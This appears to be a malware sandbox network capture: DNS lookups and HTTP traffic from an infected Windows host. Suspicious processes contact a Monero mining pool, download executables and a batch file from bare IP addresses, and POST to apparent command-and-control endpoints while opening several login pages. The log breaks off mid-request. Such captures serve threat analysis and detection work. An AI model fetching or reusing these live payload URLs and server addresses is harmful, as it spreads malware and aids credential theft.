8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

104.85.1.163
GET

https://www.bing.com/cortanaassist/rules?cc=US&version=6

MicrosoftEdge.exe

Remote address:

204.79.197.200:443

Request

GET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
host: www.bing.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 404

cache-control: private
content-length: 46685
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
set-cookie: MUID=2FFA23CE91076CEB03D6307490AD6D31; domain=.bing.com; expires=Sat, 23-Nov-2024 06:50:36 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2FFA23CE91076CEB03D6307490AD6D31; expires=Sat, 23-Nov-2024 06:50:36 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0B2901B2A62865782E171208A7826416&mkt=en-us; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Sat, 23-Nov-2024 06:50:36 GMT; path=/; HttpOnly
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 06:50:36 GMT; path=/
set-cookie: SRCHUID=V=2&GUID=EDBC2504B3444EB9928B4515E052BF55&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 06:50:36 GMT; path=/
set-cookie: SRCHUSR=DOB=20231030; domain=.bing.com; expires=Thu, 30-Oct-2025 06:50:36 GMT; path=/
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 06:50:36 GMT; path=/
set-cookie: _SS=SID=0B2901B2A62865782E171208A7826416; domain=.bing.com; path=/
x-eventid: 653f523cda0145f2bd1acdb6ffd0030e
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-error-page: 404-custom
x-ua-compatible: IE=edge
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7F93A9F2650141B0957E9E183B9CE8D8 Ref B: DUS30EDGE0815 Ref C: 2023-10-30T06:50:36Z
date: Mon, 30 Oct 2023 06:50:36 GMT
DNS

163.1.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.1.85.104.in-addr.arpa

IN PTR

Response

163.1.85.104.in-addr.arpa

IN PTR

a104-85-1-163deploystaticakamaitechnologiescom
DNS

235.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.175.169.194.in-addr.arpa

IN PTR

Response
DNS

cdn.discordapp.com

csrss.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.129.233
DNS

stun3.l.google.com

csrss.exe

Remote address:

8.8.8.8:53

Request

stun3.l.google.com

IN A

Response

stun3.l.google.com

IN A

74.125.24.127
DNS

server5.statsexplorer.org

csrss.exe

Remote address:

8.8.8.8:53

Request

server5.statsexplorer.org

IN A

Response

server5.statsexplorer.org

IN A

185.82.216.108
DNS

127.24.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.24.125.74.in-addr.arpa

IN PTR

Response

127.24.125.74.in-addr.arpa

IN PTR

sf-in-f1271e100net
DNS

walkinglate.com

csrss.exe

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.97.0

walkinglate.com

IN A

188.114.96.0
DNS

233.133.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.133.159.162.in-addr.arpa

IN PTR

Response
DNS

108.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.216.82.185.in-addr.arpa

IN PTR

Response

108.216.82.185.in-addr.arpa

IN PTR

dedic-mariadebommarez-1201693hosted-by-itldccom
DNS

xmr-eu1.nanopool.org

explorer.exe

Remote address:

8.8.8.8:53

Request

xmr-eu1.nanopool.org

IN A

Response

xmr-eu1.nanopool.org

IN A

163.172.154.142

xmr-eu1.nanopool.org

IN A

51.15.65.182

xmr-eu1.nanopool.org

IN A

212.47.253.124

xmr-eu1.nanopool.org

IN A

51.15.193.130

xmr-eu1.nanopool.org

IN A

51.255.34.118

xmr-eu1.nanopool.org

IN A

51.15.58.224

xmr-eu1.nanopool.org

IN A

51.68.190.80

xmr-eu1.nanopool.org

IN A

135.125.238.108

xmr-eu1.nanopool.org

IN A

51.68.143.81
DNS

pastebin.com

explorer.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143
DNS

224.58.15.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

224.58.15.51.in-addr.arpa

IN PTR

Response

224.58.15.51.in-addr.arpa

IN PTR

224-58-15-51 instancesscwcloud
DNS

80.190.68.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.190.68.51.in-addr.arpa

IN PTR

Response

80.190.68.51.in-addr.arpa

IN PTR

vps-f82b24e6vpsovhnet
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:51:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=3&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=3&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e71253110530
accept-encoding: gzip, deflate, br
content-length: 1096
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: M57ReNo2y2XGjHYG+tk3CN/ye1f7y0Lw1V7KFFIzFqxyWhENftBthhDUTYIlDITDXB6BGtnWOtOxnyUykDTyvQ==
content-length: 0
date: Mon, 30 Oct 2023 06:51:50 GMT
alt-svc: h3=":443"; ma=86400
DNS

stun1.l.google.com

f801950a962ddba14caaa44bf084b55c.exe

Remote address:

8.8.8.8:53

Request

stun1.l.google.com

IN A

Response

stun1.l.google.com

IN A

142.251.125.127
DNS

127.125.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.125.251.142.in-addr.arpa

IN PTR

Response

127.125.251.142.in-addr.arpa

IN PTR

nh-in-f1271e100net

77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

97.8kB
2.3MB
1549
1660

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.249:80

http://77.91.68.249/fuza/3.bat

http

Explorer.EXE

436 B
857 B
6
5

HTTP Request

GET http://77.91.68.249/fuza/3.bat

HTTP Response

200
193.233.255.73:80

http://193.233.255.73/loghub/master

http

FB78.exe

755 B
436 B
6
4

HTTP Request

POST http://193.233.255.73/loghub/master

HTTP Response

200
194.169.175.118:80

http://194.169.175.118/trafico.exe

http

Explorer.EXE

11.2kB
517.6kB
215
376

HTTP Request

GET http://194.169.175.118/trafico.exe

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/newrock.exe

http

Explorer.EXE

223.9kB
10.7MB
4518
7980

HTTP Request

GET http://5.42.65.80/newrock.exe

HTTP Response

200
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
157.240.201.35:443

www.facebook.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
3.9kB
15
12
157.240.201.35:443

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=2&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

tls, http2

MicrosoftEdgeCP.exe

20.9kB
328.0kB
282
266

HTTP Request

GET https://www.facebook.com/login

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

HTTP Response

200

HTTP Request

GET https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=1&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

HTTP Response

200

HTTP Request

POST https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=2&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

HTTP Response

200
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

tls, http2

MicrosoftEdgeCP.exe

7.0kB
123.0kB
116
112

HTTP Request

GET https://accounts.google.com/

HTTP Response

302

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Response

302

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyzNmJ-tC2HnukG8mJuyh4OFoDa8ZwV1vdu2eRuqXfBEYpnpSvVXrEFIY1BZIyomyOTfif_xyw

HTTP Response

302

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
5.1kB
14
10
104.85.0.101:443

https://store.steampowered.com/login/

tls, http

MicrosoftEdgeCP.exe

1.6kB
12.2kB
20
18

HTTP Request

GET https://store.steampowered.com/login/

HTTP Response

200
104.85.0.101:443

store.steampowered.com

tls

MicrosoftEdgeCP.exe

939 B
4.4kB
13
10
104.244.42.1:443

https://twitter.com/i/flow/login

tls, http2

MicrosoftEdgeCP.exe

1.4kB
4.9kB
16
12

HTTP Request

GET https://twitter.com/i/flow/login

HTTP Response

400
104.244.42.1:443

twitter.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
3.4kB
13
9
23.207.106.113:443

steamcommunity.com

tls

MicrosoftEdgeCP.exe

935 B
4.6kB
13
10
23.207.106.113:443

https://steamcommunity.com/openid/loginform/

tls, http

MicrosoftEdgeCP.exe

1.7kB
16.2kB
22
20

HTTP Request

GET https://steamcommunity.com/openid/loginform/

HTTP Response

200
163.70.151.21:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.0kB
16
13
163.70.151.21:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.0kB
16
13
163.70.151.21:443

https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yb/l/en_US/ylIW20mx71j.js?_nc_x=Ij3Wp8lg5Kz

tls, http2

MicrosoftEdgeCP.exe

23.2kB
386.1kB
412
369

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/R2oOyt8zLzV.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yK/l/0,cross/b2AilG_Klc4.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yJ/l/0,cross/n2KZwnfNB_f.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/fhrZ5QrtjNj.css?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/X4SsFPrb6Pk.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yR/l/0,cross/G5tcKKPynIe.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/Hw6RdThfLzT.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yr/l/en_US/Njo6HxqLwOj.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/gC0mb5XShS_.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/fiUTTh4d_Lr.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/0ZOQmhGCKxB.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/winPR9Hzn-P.css?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/1jo5ZChBkzZ.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/pD68cOkOMec.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/bG0oiWXQIFv.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/waLvPG4m_lK.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/z4ZpfEug0KG.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/H6eWxkmnnTy.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/mcFwTxKKnU1.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/1-4kfeCLxqe.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/8wkP5LeHDwh.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/rIzL2o9IwFW.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3i8JF4/yf/l/en_US/iS01O7Vrj6z.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/DB5AGw-VyeA.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/f8sllusvByo.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/mTNaUxZfqus.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/mvpnCbKmapc.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3iPwL4/yn/l/en_US/GYa6lDUdiZL.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/PEYW97egWVO.js?_nc_x=Ij3Wp8lg5Kz

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yb/l/en_US/ylIW20mx71j.js?_nc_x=Ij3Wp8lg5Kz

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
163.70.151.21:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.0kB
16
13
163.70.151.21:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdgeCP.exe

1.2kB
4.0kB
16
13
163.70.151.21:443

static.xx.fbcdn.net

MicrosoftEdgeCP.exe

160 B
3
172.64.145.151:443

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19

tls, http2

MicrosoftEdgeCP.exe

86.2kB
2.2MB
1737
1693

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=9W9LHJeR779e&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=hFJKQ6HV7IKT&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/v6/store.css?v=UrrY32e1y1Zc&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/v6/browse.css?v=wWw5tW1y7nea&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/login.css?v=N_ALu0tisSbF&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=joUly9uZoJX_&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/main.js?v=aVwmJL6U2Amu&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/dynamicstore.js?v=zT0Cl5vv5AfQ&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=uyGwRKXH0yy-&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

HTTP Response

200

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/css/applications/store/main.css?v=4yXuci3ZBfrM&l=english&_cdn=cloudflare

HTTP Request

GET https://store.cloudflare.steamstatic.com/public/javascript/applications/store/manifest.js?v=pqS062l3FhPW&l=english&_cdn=cloudflare

HTTP Request

